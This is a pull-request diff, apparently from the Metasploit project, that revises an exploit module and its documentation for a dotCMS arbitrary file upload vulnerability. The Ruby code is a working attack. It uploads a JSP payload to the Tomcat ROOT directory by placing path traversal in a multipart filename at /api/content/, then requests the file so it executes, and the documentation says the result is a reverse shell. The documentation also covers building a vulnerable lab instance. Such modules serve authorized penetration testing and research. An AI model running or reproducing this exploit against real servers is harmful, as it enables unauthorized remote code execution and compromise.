Responded to PR feedback

Author: jheysel-r7

documentation/modules/exploit/multi/http/dotcms_file_upload_rce.md

@@ -1,9 +1,9 @@
-## Description
-This module exploits an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, 21.06.7 in each 
-respective stream. The module uploads a jsp payload to the tomcat ROOT directory. It then executes the payload to 
-return a reverse shell.
 ## Vulnerable Application
 
+### Description
+This module exploits an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, 21.06.7 in each
+respective stream. The module uploads a jsp payload to the tomcat ROOT directory and accesses it to trigger its execution.
+
 ### Clone and build a vulnerable version of dotCMS:
 This requires Java 1.8 to be installed and JAVA_HOME to be set (see below for per OS instructions).
 1. `git clone https://github.com/dotCMS/core.git`
@@ -32,13 +32,13 @@ Inside each of the above compressed directories exists a directory `dotserver` w
 
 ### Ubuntu 20.04 install
 
-#### Install JAVA 1.8 
+#### Install JAVA 1.8
 
 1. `export JAVA_HOME="/usr/lib/jvm/java-8-openjdk-amd64"`
 1. `export PATH=$JAVA_HOME/bin:$PATH`
-1. `sudo apt-get install openjdk-8-jre`
+1. `sudo apt-get install openjdk-8-jdk`
 
-#### Install Postgres 
+#### Install Postgres
 
 1. `sudo apt install postgresql -y`
 1. `sudo -u postgres psql`
@@ -75,7 +75,7 @@ ES_PORT=9200
 ES_TLS_ENABLED=false
 ```
 
-#### Run dotCMS 
+#### Run dotCMS
 
 1. `cd dotserver/tomcat-9.0.41/bin/`
 1. `chmod 755 *.sh`
@@ -183,4 +183,4 @@ OS Version:                10.0.19042 N/A Build 19042
 
 <output truncated>
 ```
-Note on windows the module reports an unknown result when trying to delete the files though it does successfully 
+Note on windows the module reports an unknown result when trying to delete the files though it does successfully

modules/exploits/multi/http/dotcms_file_upload_rce.rb

@@ -15,7 +15,7 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Multipart File Directory Traversal can lead to Remote Code Execution.',
+        'Name' => 'DotCMS RCE via Arbitrary File Upload.',
         'Description' => %q{
           When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the
           file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename
@@ -38,7 +38,7 @@ def initialize(info = {})
         'Platform' => %w[linux win],
         'Targets' => [
           [
-            'Automatic',
+            'Java Linux',
             {
               'Arch' => ARCH_JAVA,
               'Platform' => 'linux'
@@ -50,13 +50,6 @@ def initialize(info = {})
               'Arch' => ARCH_JAVA,
               'Platform' => 'win'
             }
-          ],
-          [
-            'Java Linux',
-            {
-              'Arch' => ARCH_JAVA,
-              'Platform' => 'linux'
-            }
           ]
         ],
         'DisclosureDate' => '2022-05-03',
@@ -83,48 +76,62 @@ def check
     test_content = Rex::Text.rand_text_alpha(10)
     test_file = "#{test_content}.jsp"
     test_path = "../../#{test_file}"
-    multipart_form = Rex::MIME::Message.new
-    multipart_form.add_part(
-      test_content,
-      'text/plain', # Content-Type
-      nil, # Content-Transfer-Encoding
-      "form-data; name=\"name\"; filename=\"#{test_path}\""
-    )
+    uuid = Faker::Internet.uuid
+
+    jsp = <<~EOS
+      <%@ page import=\"java.io.File\" %>
+      <%
+        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{@jsp_file}");
+        jsp.delete();
+      %>
+      #{uuid}
+    EOS
+
+    vars_form_data = [
+      {
+        'name' => 'name',
+        'data' => jsp,
+        'encoding' => nil,
+        'filename' => test_path,
+        'mime_type' => 'text/plain'
+      }
+    ]
+
     send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/api/content/'),
-      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
-      'data' => multipart_form.to_s
+      'vars_form_data' => vars_form_data
     )
+
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, test_file.to_s)
     )
 
-    if res && res.body.include?(test_content)
-      register_file_for_cleanup("../webapps/ROOT/#{test_file}")
+    if res && res.body.include?(uuid)
       return Exploit::CheckCode::Vulnerable
     end
+
     Exploit::CheckCode::Safe
   end
 
   def write_jsp_payload
     jsp_path = "../../#{jsp_filename}"
     print_status('Writing JSP payload')
-    vprint_status(jsp_path)
-    multipart_form = Rex::MIME::Message.new
-    multipart_form.add_part(
-      payload.encoded,
-      'text/plain', # Content-Type
-      nil, # Content-Transfer-Encoding
-      "form-data; name=\"name\"; filename=\"#{jsp_path}\""
-    )
+    vars_form_data = [
+      {
+        'name' => 'name',
+        'data' => payload.encoded,
+        'encoding' => nil,
+        'filename' => jsp_path,
+        'mime_type' => 'text/plain'
+      }
+    ]
 
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/api/content/'),
-      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
-      'data' => multipart_form.to_s
+      'vars_form_data' => vars_form_data
     )
 
     unless res&.code == 500
@@ -138,7 +145,6 @@ def write_jsp_payload
   def execute_jsp_payload
     jsp_uri = normalize_uri(target_uri.path, jsp_filename)
     print_status('Executing JSP payload')
-    vprint_status(full_uri(jsp_uri))
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => jsp_uri